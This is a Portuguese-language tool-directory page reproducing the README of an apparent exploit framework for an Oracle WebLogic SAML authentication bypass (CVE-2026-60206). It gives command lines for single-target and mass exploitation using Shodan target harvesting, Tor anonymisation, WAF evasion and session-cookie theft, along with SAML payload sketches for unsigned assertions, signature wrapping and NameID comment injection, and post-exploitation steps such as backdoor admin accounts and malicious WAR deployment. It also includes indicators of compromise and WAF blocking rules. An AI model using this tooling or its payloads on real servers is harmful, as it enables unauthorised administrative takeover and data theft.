Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Versões Bash e Python. Recursos: --detect verificação segura, --exploit combo/unsigned/xsw/nameid/all, --integração shodan, --suporte tor, varredura em massa, saída JSON/CSV/JSONL, validação de cookies. 🛡️ CVSS 9.9 Crítico - Use Eticamente, Permaneça Legal. 🔒 | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
Autenticação e AutorizaçãoFrameworks de ExploraçãoGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoBypass de WAF

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Testes de Penetração
Red Teaming
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

Ver Repositório
422há 1 mêsAinda não revisado

Sobre

👾 CVE-2026-60206 - Oracle WebLogic SAML Auth Bypass Exploit Framework ⚡Versões Bash e Python. Recursos: --detect verificação segura, --exploit combo/unsigned/xsw/nameid/all, --integração shodan, --suporte tor, varredura em massa, saída JSON/CSV/JSONL, validação de cookies. 🛡️ CVSS 9.9 Crítico - Use Eticamente, Permaneça Legal. 🔒

Compartilhar

CVE-2026-60206

CVE-2026-60206 - Framework-Toolkit de Exploit de Bypass de Autenticação SAML para Oracle WebLogic

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access Cross-Platform

Oracle WebLogic Server — Bypass de Autenticação SAML → Assunção de Controle Admin

Framework de Exploit & Scanner em Massa
Apenas para testes de segurança autorizados.


⚖️ Aviso Legal & Uso Responsável

Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizados.

Os autores e contribuidores não são responsáveis por qualquer uso indevido ou dano causado por este software. Os usuários são os únicos responsáveis por garantir que possuem permissão explícita por escrito do proprietário do alvo antes de testar. O acesso não autorizado a sistemas de computador é ilegal sob o Computer Fraud and Abuse Act (CFAA) e leis similares em todo o mundo.

Ao usar este software, você concorda em:

  • Usá-lo apenas em sistemas que você possui ou tem permissão explícita para testar.
  • Cumprir todas as leis locais, estaduais e federais aplicáveis.
  • Não usá-lo para atividades maliciosas, destrutivas ou ilegais.

⚠️ AVISO: Esta vulnerabilidade está sendo ativamente explorada na natureza. O uso não autorizado pode resultar em sérias consequências legais.


[+!] Visão Geral da Vulnerabilidade

CVE-2026-60206 é uma vulnerabilidade crítica de bypass de autenticação não autenticado na implementação SAML (Security Assertion Markup Language) do Oracle WebLogic Server. Ela permite que invasores remotos contornem a autenticação SAML e obtenham acesso administrativo ao console do WebLogic sem credenciais válidas.

Como funciona:

  1. Injeção SAML: A vulnerabilidade decorre da validação inadequada de asserções SAML. Invasores podem criar respostas SAML maliciosas que ignoram as verificações de autenticação.

  2. Bypass de Assinatura: A vulnerabilidade permite contornar a validação de assinatura XML por meio de ataques de XML Signature Wrapping (XSW), onde invasores envolvem asserções maliciosas com assinaturas legítimas.

  3. Manipulação de NameID: Invasores podem injetar comentários ou manipular o campo NameID para se passar por usuários privilegiados.

  4. Acesso Admin: A exploração bem-sucedida concede ao invasor acesso administrativo ao console do WebLogic Server com controle total.

Fatos Principais:


🛠️ Framework de Exploit

O multi-exploit educacional completo encadeia vários vetores de ataque SAML para alcançar o bypass de autenticação, com recursos avançados para varredura em massa, captura de cookies e acesso administrativo.

✨ Recursos

Vetores de Ataque


🕵️ Verificador Seguro (--detect)

O verificador seguro realiza detecção não intrusiva de vulnerabilidades sem executar payloads prejudiciais ou fazer alterações no sistema.

✨ Recursos


📦 Instalação & Requisitos

Pré-requisitos

  • Python 3.6+ ou Bash 3.2+
  • curl (para versão Bash)
  • pip (para biblioteca requests, versão Python)

Instalar Dependências

root@kitploit:~
# Versão Python
pip install requests urllib3

# Opcional: suporte Shodan
pip install shodan

# Versão Bash: apenas curl (sem dependências adicionais)

[!NOTE] A versão Bash funciona apenas com curl e não possui dependências externas. A versão Python requer requests e urllib3 (opcional: shodan para integração com Shodan).


🚀 Exemplos de Uso

[1] Framework de Exploit Python (exploit.py)

root@kitploit:~
# Exploit em alvo único (modo combo)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# Exploit com todos os vetores de ataque
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# Varredura em massa a partir de arquivo (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# Apenas detecção segura (não intrusiva)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Integração com Shodan
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Varredura anonimizada com Tor
python exploit.py -l targets.txt --exploit --tor -t 20

# Suporte a proxy
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Saída streaming JSONL (eficiente em memória para varreduras grandes)
python exploit.py -l targets.txt --exploit -o results.jsonl

# Modo silencioso (saída mínima)
python exploit.py -l targets.txt --exploit -q -o results.json

# Timeout e retry personalizados
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# Bypass de verificação SSL
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# Depuração verbosa
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] Framework de Exploit Bash (exploit.sh)

root@kitploit:~
# Exploit em alvo único
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# Varredura em massa
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Varredura anonimizada com Tor
./exploit.sh -l targets.txt --exploit --tor -t 20

# Integração com Shodan
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# Saída streaming JSONL
./exploit.sh -l targets.txt --exploit -o results.jsonl

# Suporte a proxy
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Bypass de verificação SSL
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# Modo silencioso
./exploit.sh -l targets.txt --exploit -q -o results.json

# Depuração verbosa
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] Validador Básico (verifier_poc.sh)

root@kitploit:~
# Validação em alvo único
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# Validação em massa com relatório
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# Bypass de verificação SSL
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# Suporte a proxy
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 Versões Afetadas

⚠️ Importante: Esta vulnerabilidade afeta implantações auto-hospedadas do WebLogic Server. Aplique o Oracle CPU Julho de 2026 imediatamente.


🧠 Mergulho Técnico

1. Bypass de Autenticação SAML

A vulnerabilidade permite que invasores contornem a autenticação SAML criando respostas SAML maliciosas que são validadas inadequadamente pela implementação SAML do WebLogic.

Endpoint Vulnerável:

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. Vetores de Ataque

Asserção Sem Assinatura

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

XML Signature Wrapping (XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

Injeção de Comentário em NameID

<saml2:NameID Format="...">

lowpriv

</saml2:NameID>

3. Pós-Exploração

Roubo de Cookie

A exploração bem-sucedida produz um cookie JSESSIONID, concedendo acesso administrativo ao console do WebLogic.

Sequestro de Sessão

O cookie roubado pode ser usado para acessar:

  • Console de Administração do WebLogic
  • Implantar/desimplantar aplicações
  • Acessar recursos JNDI
  • Executar comandos arbitrários via JMX

Persistência

  • Implantar aplicações maliciosas (arquivos WAR)
  • Criar usuários admin como backdoor
  • Instalar ferramentas de acesso remoto

Movimentação Lateral

  • Acessar outros servidores na rede via credenciais roubadas
  • Explorar relações de confiança entre WebLogic e outros sistemas
  • Pivotar para redes internas

🔍 Indicadores de Comprometimento (IoCs)

Análise de Logs

Pesquise nos logs do WebLogic por:

  • access.log – requisições para /saml2/sp/acs, /saml2/acs com parâmetros SAML incomuns
  • domain.log – tentativas de bypass de autenticação com asserções SAML inválidas
  • diagnostic.log – erros de parsing SAML ou falhas de validação de assinatura

Requisições Suspeitas

  • Parâmetros SAMLResponse contendo:
    • Múltiplas tags <saml2:Assertion>
    • Comentários em campos <saml2:NameID>
    • Asserções sem assinatura
    • XML malicioso codificado em base64
    • javascript: ou eval() nos parâmetros

Arquivos

  • Arquivos de sessão inesperados em diretórios temporários do WebLogic
  • Arquivos de configuração modificados (config.xml, jps-config.xml)
  • Novos arquivos WAR no diretório autodeploy
  • Arquivos weblogic.security modificados

Rede

  • Conexões administrativas não autorizadas ao console do WebLogic
  • Varreduras de portas incomuns visando endpoints SAML
  • Conexões de saída do servidor WebLogic para IPs desconhecidos
  • Conexões de shell reverso em portas incomuns

Processos

  • Processos Java inesperados
  • Processos shell gerados a partir do WebLogic
  • Conexões de rede do usuário do WebLogic para hosts externos

🛡️ Mitigação & Remediação

Ações Imediatas

  1. Aplicar o Oracle CPU Julho de 2026 imediatamente
  2. Desabilitar o SAML se não estiver em uso ativo
  3. Monitorar endpoints SAML para atividades suspeitas
  4. Revisar logs de acesso para tentativas de exploração
  5. Rotacionar todas as credenciais em sistemas afetados

Ações de Longo Prazo

  1. Implementar regras de WAF para bloquear requisições SAML maliciosas
  2. Ativar validação de assinatura SAML com modo estrito
  3. Auditorias regulares de segurança das configurações do WebLogic
  4. Segmentação de rede para limitar a exposição do WebLogic
  5. Implementar monitoramento SIEM para eventos do WebLogic

Regras de WAF

root@kitploit:~
# Bloquear requisições SAML com múltiplas asserções
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Múltiplas Asserções SAML',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# Bloquear requisições SAML com comentários em NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Comentários em NameID',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# Bloquear asserções SAML sem assinatura
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Asserção Sem Assinatura',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 Referências

  • NVD - CVE-2026-60206
  • Advisory de Atualização Crítica da Oracle - Julho de 2026
  • Catálogo CISA KEV
  • SecurityFocus - CVE-2026-60206
  • The Hacker News - WebLogic Zero-Day Explorado

🔗 Outros Exploits

  • CVE-2026-15409/15410 - Framework Multi-Exploit SonicWall SMA1000
  • CVE-2026-6875 - Framework de Exploit RCE Pré-Auth ServiceNow
  • CVE-2026-41091 - LPE SolarFlare (RedSun) Microsoft Defender
  • CVE-2026-57821 - Toolkit de Injeção SQL Apache Fineract
  • CVE-2026-41940 - Bypass de Autenticação cPanel/WHM
Baixar ferramenta
AtributoValor
📅 DescobertaJulho de 2026 (Oracle CPU)
⚠️ Pontuação CVSS9.9 (CRÍTICA)
📋 CISA KEVAdicionado em 21 de julho de 2026
🎯 Produtos AfetadosOracle WebLogic Server (Fusion Middleware)
🔄 Versões CorrigidasOracle CPU Julho de 2026
🔓 AutenticaçãoNão necessária (Pré-Auth)
🌍 Exploração AtivaConfirmada na natureza (julho de 2026)
RecursoDescrição
🚀 Multi-Vetor de Exploit7 vetores de ataque: unsigned, xsw_v1-4, nameid, combo
💻 Varredura em MassaVarredura concorrente com pool de threads (Python) / FIFO (Bash)
🔐 Roubo de CookieRouba JSESSIONID para sequestro de sessão
👑 Acesso ao Console AdminAcesso administrativo total ao console do WebLogic
📁 Detecção de VersãoDetecta versões do WebLogic e status de vulnerabilidade
🌐 Varredura em LoteExplora múltiplos alvos com threading
🎯 Detecção SeguraFlag opcional --detect para verificação não intrusiva
🧩 Integração com ShodanCarrega alvos diretamente da busca do Shodan
🔍 Suporte a TorAnonimiza a varredura com proxy Tor
📊 Múltiplos Formatos de SaídaJSON, CSV, saída streaming JSONL
🪟 MultiplataformaSuporta Linux, macOS, BSD, Alpine, WSL
🔒 Thread-SafeUsa mecanismos de trava para operações concorrentes
📋 Salvamento Automático de SessãoSalva cookies bem-sucedidos para uso posterior
⚙️ Bypass de WAFRotação de User-Agent e atrasos aleatórios
VetorDescrição
unsignedAsserção SAML não autenticada sem assinatura
xsw_v1XML Signature Wrapping - Múltiplas asserções
xsw_v2XSW - Bypass de assinatura envelopada
xsw_v3XSW - Manipulação de namespace
xsw_v4XSW - Injeção de múltiplas asserções
nameidInjeção de comentário em NameID
comboAtaque combinado (unsigned + XSW + NameID)
RecursoDescrição
🔍 Detecção de WebLogicIdentifica instâncias do WebLogic via LoginForm.jsp
📊 Detecção de VersãoDetecta versões específicas do WebLogic e níveis de patch
🧪 Descoberta de Endpoint SAMLTesta endpoints SAML ACS
🔒 Não IntrusivoApenas identifica versões vulneráveis
📋 Saída JSON/CSVExporta resultados para relatórios
🔄 Varredura em MassaEscaneia múltiplos alvos com suporte a threading
Versão do Oracle WebLogicStatus
12.2.1.4.0🔴 VULNERÁVEL
14.1.1.0.0🔴 VULNERÁVEL
14.1.2.0.0🔴 VULNERÁVEL
15.1.1.0.0🔴 VULNERÁVEL
Outras versõesVerifique o Oracle CPU Julho de 2026